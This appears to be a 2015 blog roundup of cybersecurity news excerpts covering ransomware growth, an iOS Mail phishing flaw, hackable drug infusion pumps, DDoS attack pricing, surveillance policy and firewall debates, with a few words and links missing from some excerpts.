+ 400 Awesome Free Things for Entrepreneurs and Startups




3  +++++++



+++ GREAT interactive database on SANS top 20 and way more!!!  GET THIS TOOL!!



+ 98% of tested web apps vulnerable to attack!

Of the many findings detailed in the newly released 2015 Trustwave Global Security Report (GSR), the news that 98% of tested web applications and 95% of tested mobile applications were found to be vulnerable to attack should alarm any organization.



+ Massive growth in new ransomware, malware targeting Adobe Flash

In the first quarter of 2015, McAfee Labs registered a 165 percent increase in new ransomware driven largely by the new, hard-to-detect CTB-Locker ransomware family, a new ransomware family called Teslacrypt, and the emergence of new versions of CryptoWall, TorrentLocker and BandarChor…

What to do if your computer is taken over by ransomware



+ Serious iOS bug makes it easy to steal users’ iCloud passwords

A security researcher has published attack code he said makes it easy to steal the iCloud passwords of people using the latest version of Apple iOS for iPhones and iPads. The proof-of-concept attack exploits a flaw in, the default iOS e-mail program. Since the release of version 8.3 in early April, the app has failed to properly strip out potentially dangerous HTML code from incoming e-mail messages. The proof-of-concept exploit capitalizes on this failure by downloading a form from a remote server that looks identical to the legitimate iCloud log-in prompt. It can be displayed each time the booby-trapped message is viewed.



+ 75% of Companies Worldwide Face Significant Risk Exposure, RSA Survey Finds

overall survey results found that nearly 75 percent of respondents face significant cybersecurity risk exposure and had their overall capabilities ranked below the developed category. Out of over 400 companies surveyed, only five percent were ranked for advanced capabilities. The report also found that the size of an organization is not an adequate indication of its security maturity.



+ Hackers can send fatal dose to hospital drug pumps

When security researcher Billy Rios reported earlier this year that he’d found vulnerabilities in a popular drug infusion pump that would allow a hacker to raise the dosage limit on medication delivered to patients, there was little cause for concern. Now Rios says he’s found the more serious vulnerabilities in several models of pumps made by the same manufacturer, which would allow a hacker to surreptitiously and remotely change the amount of drugs administered to a patient.



+ Hunting for hackers, N.S.A. secretly expands Internet spying at U.S. border

Without public notice or debate, the Obama administration has expanded the National Security Agency‘s warrantless surveillance of Americans’ international Internet traffic to search for evidence of malicious computer hacking,



+ Cloud providers hit hard by DDoS attacks in Q1: VeriSign

According to research from VeriSign, in the first quarter of 2015 the company observed that those customers experienced the largest volume of DDoS attacks, accounting for more than a third of all attacks and peaking in size at just over 54 Gbps.



+ Cyber weapons: 4 defining characteristics

Nations can take advantage of anonymity and deniability while conducting military campaigns in cyberspace, enabling a type of “clean coercion” warfare. But, what is the definition of a weapon, and how can we more clearly identify when a cyberattack should be correctly labeled as a “cyber weapon”?



+ Hola VPN used to perform DDoS attacks, violate user privacy

Hola is a VPN provider that purports to offer its users freedom from censorship, a way to access geoblocked content, and anonymous browsing. The service claims that more than 47 million people are part of its peer-to-peer network. it’s dangerously insecure: the client software has flaws that allow for remote code execution and features of the client enabled tracking. On top of that, critically, Hola sells access to its peer-to-peer network with little oversight, enabling it to be used maliciously.



+ Russian crypto-malware encrypts files completely

Ransomware with file encryption routines is one of the nastiest cyber threats today, not just for the average user but also for businesses and even law enforcement departments, which have no other alternative but to pay for data recovery, unless a backup system has been set up. also known as Encoder.858 and Shade, applies full encryption of the files it processes, from content to name and extension.



+ FBI calls for new wiretap law covering social media

Encrypted social networking tools are hindering the FBI’s ability to track terrorists and recruiters who are appealing to young people in the U.S., an FBI official told lawmakers. Congress must pass a new wiretap law that requires social media websites and operators of other Internet communication tools to share customers’ communications with law enforcement agencies the same way that telecom carriers do,



+ British spies betrayed to Russians and Chinese

Russia and China have cracked the top-secret cache of files stolen by the fugitive US whistleblower Edward Snowden, forcing MI6 to pull agents out of live operations in hostile countries, according to senior officials in Downing Street, the Home Office and the security services…



+ Even with a VPN, open Wi-Fi exposes users

Those moments between Wi-Fi connect and VPN launch can give away a lot…I tested this scenario at a Starbucks with Google Wi-Fi while running Wireshark. Thousands of packets went back and forth on the open network before the VPN attempted to connect. A quick scan of the list found nothing that looked dangerous, and in fact the software on my system used TLS 1.2 in almost all cases, which was quite a relief



+ Price of website disabling DDoS attacks fall to US$38 per hour

as botnets proliferate in China, Vietnam (South China Morning Post) It is becoming easier than ever to launch a potentially ruinously expensive, server disabling assault against any website as criminal organizations offer distributed denial-of-service (DDoS) attacks at cut price rates…



+ Firewalls Sustain Foundation of Sound Security

Simply put, organizations that cannot maintain rigid firewall enforcement are more likely to be compromised…

Why the Firewall is Increasingly Irrelevant

It will take a dramatic reimagining of security to dedicate focus to the areas where company data actually resides. It starts with tearing down the firewall.



+ Conventional Wisdom About Cyber Hacks is Flawed

A recent article out of SolPass reports, “Business and government leaders who are being told that there’s no preventive strategy to stop cyberattacks and fraud are being subjected to fundamentally flawed thinking,

DO the cyber basics well folks – it works!!!



+Cybercrime Can Give Attackers 1,425% Return on Investment

Going rates on the black market show ransomware and carding attack campaign managers have plenty to gain.–return-on-investment/d/d-id/1320756



+ 11 Countries with Most Hackers and Cyber Criminals

US first (includes compromised computers)  then China, then Germany..



+Long Cons: The Next Age of Cyber Attacks

When hackers know that a big payday is coming they don’t mind waiting for months for the best moment to strike.—threats/long-cons-the-next-age-of-cyber-attacks/a/d-id/132065


Comments are closed.